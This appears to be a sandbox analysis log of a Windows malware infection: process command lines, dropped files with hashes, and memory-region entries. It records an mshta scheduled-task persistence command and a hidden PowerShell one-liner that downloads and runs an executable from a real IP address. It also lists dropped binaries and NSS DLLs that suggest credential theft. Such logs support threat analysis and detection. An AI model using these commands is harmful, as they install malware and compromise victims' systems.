"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3592 /prefetch:2

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -childID 2 -isForBrowser -prefsHandle 4232 -prefMapHandle 4228 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a67518d-5779-43e7-8a1a-0724f092761d} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" tab

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn fD235maYYx8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\zAZE3yTrd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2796 /prefetch:2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6Z8KTLLJMNBFJG8M1V4DCDHVI54AMKCK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2588 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

Network

Country Destination Domain Proto

Files


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\aa8663c4-d7c9-41d3-b875-272820fc456d.dmp

MD5 f9c8737223e4124a3bf3c8b85bb83d3f
SHA1 203f8cc46fefce88019679f79e69f7ba72b05f72
SHA256 d4b0de637737ea26026489f1ce456c6ec57fc1632fdb11e86cbc24d976b69fc5
SHA512 eeac6128af4daea37dc5660a1f724ff89307f78ea469556dd84b2e74292022007053664b930317d1e3dd59b79d9e56ff5ab3e4232a7f9d593d0b20b284b5c95d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 a2b2e2d5844d9a666f19c7b4befeb349
SHA1 1367bc44248d11bd6481ee61a41b8f0e80d1659d
SHA256 6dcee78afde43a897ef76ac2d766c9052a901eeeb171c73cc5e5c7d3a26fb2be
SHA512 6bb3a7d030e1731c784cf90163b7cbac28702a31e95441d60c19cae5c9d9d29419ff89d50f314658f67910c096db86dd5de690075b626fac9a77a23a1152ab0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\35cd4e85-7134-47db-8e10-5919f4a086bd.dmp

MD5 42ad9a603d8988dad35cf3417252f9df
SHA1 916e6d84b2a706de23b1d253688ac9b29b77ccbc
SHA256 0eee64349c2b1fcd91a27c3cbb2189824701e73c697de7ec81998b0b56a3e945
SHA512 b9a19a16842322108b730365cb1c04e3211df88cd2d370387dbee712138b5093fb52b64742fcc3c3467fb91da443eb2b4e0246eeddd37ec643ba1737d6364b7d

memory/220-1306-0x000001F23EFC0000-0x000001F23EFC8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 d8d536ed3622cb4b64bdb88ba266ba7c
SHA1 afa043de5c99d45ef1e4f832c952e8abcd91ccb7
SHA256 87bcd345940130b3cfd0b4fa64ac991c5fa5a80f5e92b7be3089982376358092
SHA512 c99ae5ab0fd99b534ac46b1efedc83529d79bf9c71482e47303c78492786859fbe4c71f153a8b2097fbf648d5d8c558cc870cc127ae40ddc2834ecc527b388eb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c17a6244-c577-4222-8472-779ad548e961.dmp

MD5 a0ce669fd17935718f48cbf6c4265638
SHA1 6ba3b2a7f78d7c1a26ed5923144ee8f088396987
SHA256 68e73eabeaf4a27cb519be9f435e4131c226377992052b4675446111aadbf709
SHA512 5794bcf032b4c060b08e82f9a0f9585a1fa0a910cbe7efa6f0ca97911db4545f31f826ffbf2c060f594ce1a51507e2ef5162a62b0190ec983e989781cd1df283

memory/3380-1349-0x000000000CE60000-0x000000000D6E3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d471ffa11f6012c3cdca79abd3e6f92b
SHA1 ab189078a11a2d7c406d1435c008af62b6f82179
SHA256 0fe0be5dec6158b225d2fd2796b377c7b578549c6d0ff6fec383a35d22f30119
SHA512 ce1b13905686fa710186a4f5966d154f7d650fb031dbb08132b8ee9fae439b76ffda817727e40ee7ec27d9792d4ecdb9adb8168e3f17062fe8b68075063db55b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\56570d5c-49c2-448e-bbfe-ea00f1af8400.dmp

MD5 7c7d4da8cb07ed523fa9a66f941f6f25
SHA1 c12e33a44f7c70023d0b316ce69ff0867e89f280
SHA256 320429629ad11f7b0181f1acdce4fe7a99a813f4d6e1620fa530a0f7e42b4377
SHA512 3152a4fc6a315a9f82c55ca203f4c2c98b3c028b1e956248a94f4ecf2c4a4492e67092e1b2a2c82690f69b1cc48f44d4b729531c388f224241b6198b1808365d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 baa722de5aa43de689f59cbdea8df495
SHA1 babf248772d6b2b11ce50b7fa459fb17a94b40c5
SHA256 f09a6afb280377ee4229632cbcb03995026787e0430ce00a26d26c63f4704eb5
SHA512 2ba07f1f2f87bd9828470a2005c3e497b853f3c56e63ecd6330f6bdb1dad1d041af669130c5a2ba5b795a0aab4cb42991965c75a9236e9cc11d2a4a19872dfa0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\4e424209-ffc0-466f-992e-3ccad2b4c821.dmp

MD5 7fc5ab7839a8be25dbcfa0df7475f7eb
SHA1 a737b25394db814453c8752457fe311196514f0d
SHA256 dad477d45787387e71068ed1b1e10e1bec16f7450ff9549ed8dc0b46b9e2a485
SHA512 a5c44c51668ac2105cbb30d1cd0a050ec00377ffc3b8f1fdac3ce2a4e7dd978b110d88f73921984a803974869d3bce6494dc76a3e8d8f1382b745741422ff9ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\56cdc40c-bfd3-49a0-aa18-5dd159308de8.dmp

MD5 bdb31a35f34531e3abbd0d142fe16e52
SHA1 7b863291e7648d7cf63ea3178a7e1e05df5bcdc4
SHA256 19f19bc423b98c6d8dc95408957c9d2c333b8632d6e559539418b80100564b69
SHA512 60b33fb684ad5499bbe3d0d3ba9b4d735c95f2009e8a17537d52fbcf982bea3ec13329cac16f7da3825df5a53f6f8139c7dbf2bbf8a3ece12c6ed8a63557befe

memory/6020-1531-0x0000000000890000-0x0000000000F8E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5b3bd69a-e2b3-4f3a-b606-0d4a0b184000.dmp

MD5 887746af0fa9fdd667a650d6e9bb13a8
SHA1 591e30e5342137a5cb6b5d0bcc1ecbad384111df
SHA256 ab672c89773af25fd39f5afe3259571f6f0c0430435f9fcc0b644d3ecb0f6839
SHA512 e804245e933404582553714c2290d51da71d1cd20229375fb6b8322fb7bc3fe36d78508d84e97713e86f700a845f4a9fee8acc8ee0a55d3821356811169d71e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 5232dae0f607ac2744a2685bfd9f6368
SHA1 d16b465538e06868baf4883b819ead6971250bf7
SHA256 c8115453bb4efce96e386f0f898e975fd448de48bbcc50b80e1cee53b2a4de8f
SHA512 ad86e8b7282c20adfc72a937826d77facfd91ee86140c7219d2efd63b7df044566ac552bf1b05f026a2f8e4e7512b6a66d967628febb2700c4851211a8249501

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e1ca6ce2fa79cc84df09d00bb0a5af55
SHA1 8c01a0b7de9b404c5d6d612f652437565af4a296
SHA256 77232ff707bc3a92b2c5fe594a62e293ccc9517def5836d23f3634121d6bae5d
SHA512 ba64ac9526add3ce2bacb7ed612030ba2c7a4152dfde4f513c8539f1c2ceb576b2ba2fe6b8ebbba720c16d852938d92dcd458452f967615c03c94204ee233e63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 92871df714b08f144134ca9ea00a33ec
SHA1 668549118926874b36a537dbc58f3bafbb9c9219
SHA256 5deacee9f1c939c4dfe2ffc6308ce1e7925a73d10a83ff2aa0e5077c1ed260a0
SHA512 ad941c13c612cded799dc5a8e72a737f795169bcaab6b5f8f7cbd4fd6b1fa6b781c9cbd94555125583576286051c74aacbc82144a0dbdf4d5c073b35a545ae2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1747fb97-b896-4c2e-9a62-c6ae3cd3562b.dmp

MD5 aafbba4308c377b3a865286f9574f236
SHA1 83b5365825938eb6e8137d743a7af2e707ba0fa8
SHA256 c88df9c005f746a33c53d64c3aab12536cd1f1d7728341c569704abee9d48728
SHA512 6a8dd27e1221085cf82b8f33534e2246122a5987ff3970ac94c760bef931dcbd6af29ab10021f92383cac79001943617ca82d348de1763f2f374b7d223bd0aa9

C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/5520-1676-0x00000000003F0000-0x0000000000891000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\27ce1c82-0c42-49f9-adea-19d98daf5b5d.dmp

MD5 64ab36b53afdcc5d95ad2cabd151ae82
SHA1 32672c1e0716b4f8d7bc35ca904464720ba05184
SHA256 62843fb391586bdec6b0eecd4e97bcd792fe9c98e195e714240b019fe82b59de
SHA512 e7813b3dc91aaed381ca5a141dbd6f830c2fbc7f32314c52f17a57bc00cf96153e1e386255ad27baf403cf2e217d6104f850f4a666c38ed1fe73c9b4986b5b01

memory/4732-1766-0x0000000000740000-0x0000000000BF4000-memory.dmp

C:\ProgramData\ED6714AF42F86723.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\ProgramData\JDAFIEHIEGDHIDGDGHDH

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\ProgramData\BFHDHJKK

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/6020-1816-0x0000000000890000-0x0000000000F8E000-memory.dmp

memory/5520-1818-0x00000000003F0000-0x0000000000891000-memory.dmp

memory/5520-1817-0x00000000003F0000-0x0000000000891000-memory.dmp

memory/5520-1823-0x00000000003F0000-0x0000000000891000-memory.dmp

C:\ProgramData\HJDBAFIECGHCBFIDGDAA

MD5 97a1891bbece06f7bda2b2423eb2b29b
SHA1 e0dc9021e58492a876cd8e402e3251ad1558c01b
SHA256 fa55154147e0d6f256bdeccd70bb7279c4ef63fea25e388afa6587a9c099f5a6
SHA512 03981b469ba5e5211245afcdd33574c2e6625480cbc58715af0e7c721a20e85af3033d22b809234bceb5df9ea8b0f5bfe013a30c76b1839b3924c44011b4aaff

C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/6020-1857-0x0000000000890000-0x0000000000F8E000-memory.dmp

memory/5532-1859-0x0000000000480000-0x0000000000B6E000-memory.dmp

memory/4732-1860-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/960-1861-0x00007FF72C910000-0x00007FF72D1D4000-memory.dmp

memory/960-1862-0x00007FF72C910000-0x00007FF72D1D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/5532-1917-0x0000000000480000-0x0000000000B6E000-memory.dmp

memory/2716-1918-0x0000000000B70000-0x000000000126E000-memory.dmp

memory/2380-1956-0x0000000000FF0000-0x00000000016EE000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/5544-1975-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe

MD5 7ebfd3c200d1cef79141205b2232d04e
SHA1 9507b4780dc90ac98995ab6987cb76cc3e85cf3d
SHA256 ee097a32ba863725396bd41b54d0dc023d1a15e7e619cd009e93047e4c95be38
SHA512 17cae57fb8194b470e8abc3a5072b2f63a119e10dfc6b44456123f4493632b01bb1e80d15121f63f0dc48c5050c90109c1d17c6ffccd470c11d1e8f36874b73f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7d427f0a1c891a00c20ac33a3627a1f7
SHA1 f3a59763edee358eceef505050ac92d72cf8c185
SHA256 30a6dc7a6229ffb1d24467a1350360eb8d242bdce537ccdacf686bd3abf05a67
SHA512 b2e376e3f404d06621baaecb4ffdf08bd9a1b64842933dfa578c6175ffae8e507a1abf3927e768fbe2d51360b9f122a18a6e63968700b4959dd79647861a0a11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ceac0f59-ed4d-4b50-b8f7-69e5720ab195.tmp

MD5 8a5688289ce1454a414accfedf89696b
SHA1 7dd12391e527c7fd10872018b6ed5c3b4a3c79c6
SHA256 0fcd7747063aa8b4642f36d0177065c4d4440467f9af143335d3918d9bb40c31
SHA512 66811083b6a33c17e059ef5a47ebf5c309beeb79c2d229f0e5f5d68354f02a71897a1f60d5d5b16d53128f61970d856b60557265b62275f3af0c8c951ea6b0cf

C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/2016-2046-0x0000000000D10000-0x0000000000D88000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 10c94f1b713bbc991b7f3270729bbef4
SHA1 81a7e1eb750e65dfb08d3237db888d3f354c3162
SHA256 7a775f1c3d46950af8e8e18216852ef1668e42e5676b366a71bc6aeeefc6f4f8
SHA512 9d9c95290a6412f23f263a23a2383dd955155e61aa6d9325c0261fd54c407fbb8bc78694459495a3f543346ee79bd696caa6f059c9ff709eb70fa4e800755a1b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\36db79ff-787f-43ce-8751-662240458522.dmp

MD5 61eafdaf08bd98317e406782e5a48484
SHA1 9d5791c3f833af534edb9340f61a0eb632abf98d
SHA256 2c34bc87a3f46ae8b508c2a5bb98948a020719edeb2ce0cbf539234b627d4b9c
SHA512 26f69da5c1ffa04c71bee49d21b6900ece1054b00fc1096462afdd0f99f3dedb82fffbd820860f8707443792d84680acb84532f326ad7c756ca7dda07cb12e8f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c006aab967a37baef3c7d9aebca2f9c6
SHA1 028c4afa6c246c016d1020acb08d235fc456528a
SHA256 e8efcc1fdaf3428ef455b2bfda38c170af28a06ba13f6430803732d47b9bbff0
SHA512 7ce6827f4b5d0a22fef2b6933d31886c105de95dc34975a7406afd87162450a0186d5615134a99ed5aa5157a1e6f8dc29467ec1760bf50f1b3453fa219ee29fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 8997936ebd16be631b0b98166a0042a3
SHA1 837ca5c516791aaf5b326a0368b4041a5d1c6ece
SHA256 e45fa6c7216f0da05859a3b744cbee28bcc5ce3cdc78af995cbe4bfdeab9d371
SHA512 cb58ded9f4c338f5c4f6e39b2ab3445e2936f429464629232fd08e23cf38b144d4a502e689a056da152bf1e7d44e349442120d8cb29a3ae9ad605d73c6bb4f22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8da48f8e-5303-490a-91a7-794113eac425.dmp

MD5 d883eb6264f822403da04297ae6e0fd8
SHA1 039019b72c054f2f28cf64248c881c2d1c98b168
SHA256 91ff59ad4cdf9287d547729a0ca0c304b6b4cf03c49840ad3434c4f634a14067
SHA512 e47a53a419fb6784dddc0c391ddd914374063c0c0cb84113902f8008363ed61090c4d874d3713f08dff78635a85f8d49443acd46c1a10e1caafabe024e6b8599

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a410598ff174a59670cee89ab7f953e5
SHA1 7498ef5893f7d9214aa935f5858b6f03ff07dbbc
SHA256 1321953dbcb50e3059995e0dc66c25465deeb6b103ef392a55a2514037d810f4
SHA512 ad2ced129582f500b870ace0c2cf459d977333232d44a82da409e987e3dd5cea5cc458340f891c7924041a44bcc6e1c8b7b1eb6810132a0b5d47e15d99224a1b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 17d5f67ff31ea00cd347296963abdf2d
SHA1 9915fc362cb19c5eb9a4e7a202942afab1ce82de
SHA256 04def4574acda71000d791e9200afa24a4438bb76790f405b6fbb18398688c9e
SHA512 981c30ad715dca7adb98cd19c6d097441044d62478810f444dbf0da04492d7ede60fb81a3c07a14962a35c8b5fd92e3ef5eed0ac0d09ec41e9e6be6799d2ca91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d128003e-cc2b-445a-a2a2-63507a04c0b8.dmp

MD5 c9822ba801468b77372977766aab156a
SHA1 b385bbc0ea999beb8885d1d8c48d7fbef16edf68
SHA256 787dfb5e019770b45f7bf33c4a0919dcc5591eb2f786b58dabb360ca9df4ba7a
SHA512 ded762e36ae496e11539394ba105b179bd4e959d5743ea6d72e78b693db1322081e13bdfe0125609b9816cbdf56e1c4637d4363cfb3706ce3b2f9d3a7debabba

memory/5456-2173-0x0000000000C50000-0x0000000001637000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 10468a8944b7f77fe3522ac938ca7181
SHA1 e2258fd69bb74bd3928f977255b2aa898da07acd
SHA256 2608bfded240552224ddab56f030b54f35a8f88bf55c28ad0247dbfc2de0e3b1
SHA512 3e85eb2709546afbce4276892d0d468ab8f82262fe2cd8474fd639ea4feb0675510b0473b1c0a1b1eb476e6127e58309740e1bd44c2c0549c64cd0c1246d77a1

memory/2716-2175-0x0000000000B70000-0x000000000126E000-memory.dmp

memory/6576-2176-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/6576-2179-0x0000000000740000-0x0000000000BF4000-memory.dmp

memory/6752-2188-0x0000000000400000-0x0000000000840000-memory.dmp

C:\ProgramData\freebl3.dll

MD5 550686c0ee48c386dfcb40199bd076ac
SHA1 ee5134da4d3efcb466081fb6197be5e12a5b22ab
SHA256 edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa
SHA512 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e

C:\ProgramData\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe

MD5 cc1a40ae718a316ece1fa40898297c32
SHA1 1400b072dffc6b9300e48b35bbb8f9f9a93ae357
SHA256 0f00394667da2e8756cbc43b414f053e2923b77198e7972710a4f643d3d9437c
SHA512 af551538724552dc4699a82c8324c83c17187b13afa716de359e891ff2d66f9a5a00de817dc73294d635a2c71a49ee3374f91eae40c9730ec776c8c1907bd5bd

memory/7128-2225-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/2380-2221-0x0000000000FF0000-0x00000000016EE000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\FHJKKECFIECAKECAFBGCAFHDHJ

MD5 d61077d22a31c5a4ef94c7670a228746
SHA1 4ee69f64203c5a4fbc7c04cad457185051447763
SHA256 4d191c8e8358c17e4d1709d29020337c05f842949bf9da20bdab3d246cdcb8d0
SHA512 8082414bca43c99daaffababbcf3435798f8a3ebca7e728fa0d684602c6aec71366a361aac22e3bb4183aa18903e44a5d7cebea8b64b93c3ad23f4b7f51cbb0d

C:\ProgramData\FHJKKECFIECAKECAFBGCAFHDHJ

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

C:\ProgramData\vcruntime140.dll

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

memory/5544-2264-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c903336781094144dc2d1dbb77d87582
SHA1 e992dcdcdf776fd1c7a8b621799858ce59663492
SHA256 c35aa45bc6010bc59b38004f00edee00b846628da022f6799c990db90a52e271
SHA512 6e9d7d73f163c0147ef86620e318ed2426b28dd8eaae6e09796a9aa26e831fc9cd191e2242d88e3c7a01d8898fbcc7ec82c4196c42f5f3305377abdc0273109d

memory/5456-2266-0x0000000000C50000-0x0000000001637000-memory.dmp

memory/2716-2273-0x0000000000B70000-0x000000000126E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 c0bc41a86ee2ceeac0511db1276c6eeb
SHA1 e3322f1f4f8cb63027fb5bebf8ec599c1a9a5f9c
SHA256 9d26577065eef088b0093b4a670060b78709b6274f04a839962973a362c82bf6
SHA512 a3a2342b6382112c69f5e1a3e02ff01fc6034d29b65c8cf93952461089c5cfe03ef737f0f649ba78874f49ab4ae481edfa6e765696b2ff9c0d4d4b46d2812bed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5671f911-d790-4ad9-96d5-8b390e3b992d.dmp

MD5 33f6a304781d5c5e69792747bde1a1af
SHA1 b8fd7936867dcb4b455f483bd0fb8d34b3de4732
SHA256 5bd11e05dabb590425b48886f43e80a8b322afcc4265214c618886d8921997bb
SHA512 44f44268aec4458978765a8e090dc8733721bb4523d03b51a1b318948fe232fcd9c8ecea977ebac782f5dd034eeffc588805bba45937ceeae71b00dc2dcb861a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 424f172f23ae1ad7b9e06b553a27deed
SHA1 9ad7a92c8423d66b2439167e78b9c55966f3a615
SHA256 1d872e4d9b63944a1d477b3690e7b4e1c649bc2d75a90c3614929601db924b36
SHA512 70199e280890fddfabf4c2b8173cad3ed687a1a62dafe82b2c07ebe7fbf2086f0aa003058f236549e98a8e6b9f454291adef936489926ef01a57a1095748b461

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 5b80631acf48ea5a324ce72cfac5fb1e
SHA1 82016468289d6920f6cb4122efb982c08b532d8e
SHA256 61b37d0d9dab8a8e3810f2a923012352c98e830c7ffa347c653ad47056fdddd3
SHA512 2c50b669f6b3796833db86789221c3de042cf7f12c06415ed8f29772a10965db29824d21bce836b26685535f7feedd0278979159bfe1042270d09a16251b8fba

